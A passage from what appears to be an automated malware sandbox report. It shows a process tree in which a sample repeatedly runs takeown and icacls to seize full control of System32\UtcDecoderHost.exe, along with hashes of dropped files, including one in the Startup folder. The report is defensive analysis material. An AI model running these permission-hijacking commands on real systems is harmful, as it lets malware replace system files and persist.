                                                                                                                                                                                                                                      PID:5352
                                                                                                                                                                                                                                    • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                      "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:436
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:744
                                                                                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Possible privilege escalation attempt
                                                                                                                                                                                                                                          PID:3204
                                                                                                                                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:6000
                                                                                                                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                            • Possible privilege escalation attempt
                                                                                                                                                                                                                                            PID:5452
                                                                                                                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                              PID:5124
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:5980
                                                                                                                                                                                                                                              • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                  PID:1624
                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                    PID:4468
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3176
                                                                                                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                        PID:5712
                                                                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:6020
                                                                                                                                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                        PID:1012
                                                                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                                        PID:5744
                                                                                                                                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                          PID:5920
                                                                                                                                                                                                                                                        • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                          "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                            PID:2524
                                                                                                                                                                                                                                                          • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                              PID:6108
                                                                                                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                              PID:3132
                                                                                                                                                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                                                              PID:3252
                                                                                                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                              PID:3140
                                                                                                                                                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                PID:5764
                                                                                                                                                                                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5448
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  PID:4228
                                                                                                                                                                                                                                                                • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:5596
                                                                                                                                                                                                                                                                • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:2380
                                                                                                                                                                                                                                                                  • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:4108
                                                                                                                                                                                                                                                                    • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:4248
                                                                                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:5444
                                                                                                                                                                                                                                                                      • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                                                        PID:4428
                                                                                                                                                                                                                                                                      • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                        PID:5200
                                                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:3812
                                                                                                                                                                                                                                                                        • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:5012
                                                                                                                                                                                                                                                                          • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:2056
                                                                                                                                                                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                              PID:1736
                                                                                                                                                                                                                                                                            • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                              • Possible privilege escalation attempt
                                                                                                                                                                                                                                                                              PID:3540
                                                                                                                                                                                                                                                                            • C:\Windows\System32\takeown.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\takeown.exe" /S KBKWGEBK /U Admin /F "C:\Windows\System32\UtcDecoderHost.exe"
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:5932
                                                                                                                                                                                                                                                                              • C:\Windows\System32\icacls.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\icacls.exe" "C:\Windows\System32\UtcDecoderHost.exe" /INHERITANCE:e /GRANT:r Admin:(F)
                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                                                                PID:6072
                                                                                                                                                                                                                                                                            • C:\Windows\System32\sihclient.exe
                                                                                                                                                                                                                                                                              C:\Windows\System32\sihclient.exe /cv ppQx/VIl0keqW2GSJ5P1sA.0.2
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:1132
                                                                                                                                                                                                                                                                              • C:\Windows\system32\backgroundTaskHost.exe
                                                                                                                                                                                                                                                                                "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:3560

                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ES6L05N7.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  550KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  ddbb452b49482a93a7733037deeda688

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  aae9eb5670bad8fbaded7624ec3d687222310f1d

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  b083810810576a32ed16002acc3db505a75148d65783e2462e734b29a2710643

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  84343374d9b27468b9e9ba40df81ba0a95fe676c03a62877c327e265ed19520f4e4ce147742b06b3eb83e02436e7758ffd6f53b311dffdcec39bba50f70ebc2d

                                                                                                                                                                                                                                                                                • C:\Windows\System32\UtcDecoderHost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  448KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  89924677e9bfd8083448419a882950c6

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  83a560187d24457003403a70b133906dd2169cd4

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  7c41eabecc24e523c471266cdb14a96631f0e1836a53f29e5b59d9a4b7a0e3b9

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  84b68a9ba11a6b39fff6d654f09e17ff72f7115605863475880ffd777aceacb2149c2f9b0254b14f2450c837ad33513d91106663def4990acee314691be9b5c9

                                                                                                                                                                                                                                                                                • C:\Windows\System32\UtcDecoderHost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  550KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  91e8d5f50550eb09155f5826fcd8c3bb

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  50cec13ae8ad8f2e284d77ddb697da536ce57168

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  fb3ae4f7dff787ca34db08a35df7422f27eef737e1345f98f35966bb35efea3b

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  99c3c7dcc1acf7fb809f7042cce9c9c3570d1b7242d57f6b3fdd66552c7d8a55878d98cbcb0fbc63b6d6651511ba105e4590b2891dd1ecb7686715df06a07caf

                                                                                                                                                                                                                                                                                • C:\Windows\System32\UtcDecoderHost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  550KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  3b47000619b1639286ba920ab520bc50

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  6789bbd7e89ccf7b38413445b4d21c7d1ee2ce0c

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  2f91e120416029ce039622a55e7093faea2d1a60f5f9b3ec88daeefbbb6d5b8b

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  c2757193af8963916c67bdcf60ed8988c7b53a1f3222e2d3580fdab9c83538a905b730c15a5ee28f845fccf4dda896fc0a6f336d88a66991e52e2937a406e34f

                                                                                                                                                                                                                                                                                • C:\Windows\System32\UtcDecoderHost.exe

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  550KB

                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                  eb000f34b52e3f4835d574f51f9151e6

                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                  fcbef0a4f6c3ddd2828c9b040d3901e47d5c7756

                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                  cf76d9f7ecdad54c837aea4b85fa6b22a7302ae8a5f5b69662e4454d82010963

                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                  06af9ee81e6cd7548c2102bd004a7a081a177a275a811b700e97ec1fdf094f7d81c3b1aa77b8fe77e6803589d1fac443cd18a4d6ca4311ee6684acff430d3ea2

                                                                                                                                                                                                                                                                                • memory/1112-0-0x00007FFF26BA3000-0x00007FFF26BA5000-memory.dmp

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/1112-1-0x000002AB932C0000-0x000002AB932E8000-memory.dmp

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  160KB

                                                                                                                                                                                                                                                                                • memory/1112-2-0x00007FFF26BA0000-0x00007FFF27661000-memory.dmp

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  10.8MB

                                                                                                                                                                                                                                                                                • memory/1112-1009-0x00007FFF26BA3000-0x00007FFF26BA5000-memory.dmp

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  8KB

                                                                                                                                                                                                                                                                                • memory/1112-1130-0x00007FFF26BA0000-0x00007FFF27661000-memory.dmp

                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                  10.8MB